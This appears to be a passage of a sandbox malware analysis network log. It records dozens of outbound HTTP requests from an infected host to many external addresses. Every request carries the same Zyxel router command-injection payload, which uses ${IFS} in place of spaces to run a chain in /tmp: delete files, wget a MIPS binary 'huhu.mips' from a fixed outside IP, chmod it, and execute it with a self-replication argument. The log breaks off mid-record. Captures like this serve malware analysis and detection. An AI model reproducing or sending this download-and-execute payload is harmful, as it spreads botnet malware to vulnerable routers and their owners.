                                      Jan 19, 2024 17:29:41.957803011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6583192.168.2.1446254209.76.4.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.957853079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6584192.168.2.144451035.66.207.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.957916975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6585192.168.2.143658476.249.40.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.957926989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6586192.168.2.1450476159.160.48.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.957950115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6587192.168.2.1458774185.255.60.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.958000898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6588192.168.2.144396299.47.50.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.958040953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6589192.168.2.145985418.96.192.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.958089113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6590192.168.2.1452740189.62.239.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.958120108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6591192.168.2.145767441.76.68.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.958170891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6592192.168.2.145935875.1.64.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.958198071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6593192.168.2.1448790154.100.133.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.958250046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6594192.168.2.1450256113.100.251.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.958290100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6595192.168.2.1440260191.252.247.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.958328009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6596192.168.2.1441496142.35.4.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.958369017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6597192.168.2.144112650.151.69.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.958410978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6598192.168.2.1447478145.89.178.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.958460093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6599192.168.2.144891893.146.203.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.958509922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6600192.168.2.144139423.37.142.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.958554983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6601192.168.2.144617834.119.133.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.958585978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6602192.168.2.1448250193.77.86.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.958622932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6603192.168.2.146085890.63.61.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.958656073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6604192.168.2.145597849.180.237.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.958729982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6605192.168.2.1442190137.147.155.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.958774090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6606192.168.2.1433226140.182.71.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.958797932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6607192.168.2.1451224155.145.147.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.958836079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6608192.168.2.1434222164.129.28.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.958894014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6609192.168.2.144454268.30.123.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.958909988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6610192.168.2.143670474.170.119.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.958956003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6611192.168.2.1444028217.249.92.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.958987951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6612192.168.2.144943243.54.115.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.959057093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6613192.168.2.14408824.141.195.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.959089994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6614192.168.2.1442612130.187.82.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.959136009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6615192.168.2.1460242120.133.216.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.959156036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6616192.168.2.1449636165.115.47.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.959235907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6617192.168.2.143614645.251.29.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.959280014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6618192.168.2.1452400188.185.95.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.959312916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6619192.168.2.145839423.3.124.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.959379911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6620192.168.2.1451050165.227.135.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.959408998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6621192.168.2.1450156190.40.233.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.959448099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6622192.168.2.146051858.237.13.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.959491014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6623192.168.2.144726670.135.181.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.959534883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6624192.168.2.144393498.187.23.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.959563017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6625192.168.2.1459696174.77.144.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.959611893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6626192.168.2.144281294.57.181.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.959638119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6627192.168.2.143507446.180.85.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.959712029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6628192.168.2.1452366158.3.6.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.959743023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6629192.168.2.143780442.194.38.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.959795952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6630192.168.2.1440112179.147.65.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.959840059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6631192.168.2.145937472.139.49.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.959888935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6632192.168.2.1442752217.197.123.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.959927082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6633192.168.2.1448570113.56.35.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.959954977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6634192.168.2.1452154145.110.39.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.959996939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6635192.168.2.144698482.132.148.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.960042000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6636192.168.2.1457618111.185.249.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.960097075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6637192.168.2.1434244170.43.156.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.960144997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6638192.168.2.1440828185.32.132.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.960186958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6639192.168.2.143877886.254.228.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.960216045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6640192.168.2.1435702216.239.125.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.960253954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6641192.168.2.1454362219.255.164.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.960315943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6642192.168.2.143754081.192.174.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.960374117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6643192.168.2.145886051.42.228.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.960484028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6644192.168.2.144391677.112.114.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.960529089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6645192.168.2.145330463.230.70.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.960571051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6646192.168.2.1434166219.137.210.211443
                                      TimestampBytes transferredDirectionData
